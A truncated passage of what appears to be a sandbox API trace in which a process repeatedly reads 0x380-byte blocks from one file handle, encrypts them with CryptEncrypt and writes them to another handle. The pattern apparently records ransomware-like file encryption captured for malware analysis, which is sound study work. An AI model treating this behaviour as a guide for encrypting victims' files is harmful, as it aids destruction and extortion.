pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.820] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.820] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.820] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.820] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.821] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.821] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.821] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.821] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.821] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.821] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.822] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.822] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.822] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.822] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.822] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.822] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.823] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.823] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.823] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.823] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.823] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.824] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.824] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.824] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.824] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.824] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.824] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.825] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.825] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.825] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.825] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.825] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.826] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.826] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.826] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.826] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.826] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.826] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.827] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.827] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 